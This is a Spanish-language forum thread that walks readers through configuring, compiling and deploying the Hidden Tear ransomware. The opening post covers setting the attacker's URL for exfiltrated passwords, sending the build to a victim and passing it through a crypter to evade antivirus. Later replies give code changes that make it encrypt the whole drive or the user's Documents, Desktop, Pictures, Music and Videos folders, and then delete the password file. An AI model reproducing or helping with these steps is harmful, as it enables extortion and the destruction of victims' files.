Configurando Hidden Tear (Online)

Iniciado por blackdrake, Octubre 21, 2015, 06:40:22 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 21, 2015, 06:40:22 PM Ultima modificación: Marzo 19, 2016, 05:16:07 PM por blackdrake

Sigo con las publicaciones sobre este ransomware de código abierto, si no has leído las anteriores, te recomiendo que lo hagas:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Para comenzar a configurar este malware, debemos descargar su código source, podemos hacerlo desde su repositorio oficial en github: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Para poder modificarlo y compilarlo, necesitaremos Visual Studio. Abriremos el proyecto que hay en el directorio "hidden-tear", no tendremos problemas para entenderlo y modificar las cosas que queramos, pues el código está perfectamente comentado y muy bien estructurado.

Lo primero que vemos, es a que url enviará el ransomware la información del ordenador y la contraseña, para ello, debemos poner nuestra url y tener el archivo php que se encargue de recibir los datos correctamente creado y con los permisos adecuados.




Ambos ficheros deberán tener permisos de escritura.

En ese paso, podremos modificar la contraseña que queremos que cree aleatoriamente, aunque se puede modificar para dejarla fija.


Aquí podremos elegir que se envía a nuestro fichero php y por tanto se guarda en los logs.


El método de cifrado de ficheros y la extensión que se utilizará.


Extensiones que se encriptarán, podemos suprimir alguna o bien, añadir más.


En que directorio se guardará el txt con el mensaje que queremos dejar y empezará a ejecutar el ransomware, es muy importante que exista el directorio o dará un error cuando la víctima lo ejecute.  Además, tener en cuenta de que si empieza en el Escritorio, no afectará a directorios superiores, para afectar a todo el disco habrá que ejecutarlo en la raiz de C:\ o bien el directorio que nosotros queramos.


Compilamos y se lo enviamos a la víctima.

Por desgracia, Hidden-Tear ya no es fud (Fully UnDetectable).


Como cualquier malware, se puede pasar por un crypter para evitar que sea detectado.



Ejecutamos Hidden Tear y comprobamos que nuestros ficheros se han cifrado con la extensión .locked


Vamos a nuestro fichero de logs y conseguimos la contraseña para recuperar nuestros ficheros.


Utilizando otro proyecto llamado hidden-tear-decrypter (también en github), podremos recuperar los ficheros, utilizando esta contraseña.

Nota: Si alguien le editó la extensión .locked, deberá modificar esta línea escribiendo la extensión que utilizó.



Y tenemos nuestros ficheros de nuevo!


Ver en el blog: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos!



Ta muy bueno ese jodido Hidden Tear, a parte de que es PHP uffff a ver si le echamos un bueno ojo (y no el de atrás)... y de paso si podemos generar el run ese para otras plataformas :3 Salutones :D

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Acepta con humildad y aprecio que en la vida la muerte es inevitable y amarás ésta, adorando la muerte

Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D



How Can we affect all C Path ?  Thus; What can we edit in code to affect all C path in the below code:

Código: text
 public void startAction()
        {
            string password = CreatePassword(15);
            string path = "\\Desktop\\"; <<<<<<<<<<<<--------------(what do we put in here ? to affect entire C disk Encrypt ?)
            string startPath = userDir + userName + path;
            SendPassword(password);
            encryptDirectory(startPath,password);
            messageCreator();
            password = null;
            System.Windows.Forms.Application.Exit();
        }

Diciembre 24, 2015, 01:16:48 PM #5 Ultima modificación: Diciembre 24, 2015, 01:22:05 PM por Hu3c0
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta the brother  @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta  responses  your question in the post above

Change this  string path = "\\Desktop\\"    by   string path = "\\"  only with double  backslash and the program starts  changing all harddisk 's extensions


Great post brother blackdrake i didn't see before maybe i'll do in java because it has similar sintax.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Holaa esta bien el programita los ficheros datos.txt y test.php llevan el mismo codigo php dentro? o es que subes test.php con ese codigo y luego cuando la persona abre el ransom se crea automaticamante datos.txt? y luego entraria en datos.txt para ver el pass ? no entendi porque dices que datos.txt y test.php tienen q estar configurados y con permisos pero no muestras si el archivo datos.txt lleva el mismo codigo por eso me salio esta duda. si es que se crea automaticamente o como es. gracias por la posible respuestas. un abrazo y creo que cosas asi son las que me han llevado a estar pegado a este foro. Gracias por los grandes aportes que haces

Test.php tiene el código que muestro, datos.txt estará vacio hasta que se ejecute y guarde algún dato.

Saludos.



Gracias muy buena, eres un crack!  saludos

Tuviste que modificar alguna cosa mas? solo cambie la pagina web compilo y no se ejecuta . el ejecutable que viene ya si se ejecuta pero si lo compilo sin hacer cambios en el codigo no se ejecuta tampoco. la extension aunque sea .locked tambien hay que cambiar la linea que pusiste por .locked o solo si es por otra cosa? no entiendo mucho porque sin hacer cambios ninguno y volverlo a compilar no funciona , y el ejecutable original es el unico que funciona. quizas falta algun cambio por ahi y el ejecutable ese lo haya puesto desps. un royo que me monte yo solo seguro

Pues si, funciona haciendo esos pequeños cambios. pero hay que hacerloss si no, no sirve.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.



No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.

Prueba a filtrar esa excepcion con un if
Mi blog: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si necesitas ayuda, no dudes en mandar MP

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Muy bueno tu post, una consulta hace una semana probé este Malware cumplió su cometido pero solo con archivos que estaban en mi escritorio, Archivos que estaban en mi unidad D, seguían normal  ??? o es que no eh leí bien la configuración  :'(

Seguramente no esté bien configurado el path de donde empieza a ejecutar.

Ej: Si empieza en \\Desktop\\ solo afecta a todo lo que haya ahí dentro, en cambio si lo pones en \\ afectará a todo el disco y así...


Saludos :D


Hola Black, antes que nada, excelente post, nos ayuda a entender como funciona este tipo de malware, ahora tengo una duda, si pongo que el proceso de encriptacion inicie en "//", empezara a a encriptar toda la carpeta de Users, pero al llegar a la carpeta Appdata, el programa crashea, porque me indica que necesita procesos de administrador, para acceder a esa carpeta. La pregunta es, como puedo excluir esa carpeta, o como puedo hacer que la encriptacion solo ocurra en las carpetas Documents, Desktop, Pictures, etc. Gracias por tu atencion, por tus post y por tu tiempo. Saludos.

Mmmm la verdad es que nunca me había planteado ese caso, teóricamente el proceso rompe porque crashea, si es así (y te da error entiendo), podrías poner una excepción en esa parte de código, para que sea algo controlado, eso si, debería estar dentro del bucle, para que este, siga ejecutándose.

Ya nos cuentas.

Un saludo.

Hola, gracias por responder, termine haciendo esto:

Código: text


public void startAction()
        {
            string passwordPath = userDir + userName + pcPassword;
            string password = File.ReadAllText(passwordPath);
            string path = "\\Documents";
            string path2 = "\\Desktop";
            string path3 = "\\Pictures";
            string path5 = "\\Downloads";
            string path6 = "\\Music";
            string path7 = "\\Videos";
            string startPath = userDir + userName + path;
            string startPath2 = userDir + userName + path2;
            string startPath3 = userDir + userName + path3;
            string startPath5 = userDir + userName + path5;
            string startPath6 = userDir + userName + path6;
            string startPath7 = userDir + userName + path7;
            encryptDirectory(startPath, password);
            encryptDirectory(startPath2, password);
            encryptDirectory(startPath3, password);
            encryptDirectory(startPath5, password);
            encryptDirectory(startPath6, password);
            encryptDirectory(startPath7, password);
            messageCreator();
            password = null;
            File.WriteAllText(passwordPath, String.Empty);
            File.Delete(passwordPath);
            System.Windows.Forms.Application.Exit();
        }


hola, muchas gracias por tu aporte.
sabes hay algo que no entiendo, es sobre php.
me podrias explicar mejor esa parte, si no es mucha la molestia.
no entiendo lo de la configuración para recibir los datos, se hacen en el servidor? se crea un php en servidor?
de antemano muchas gracias!!
""El problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente""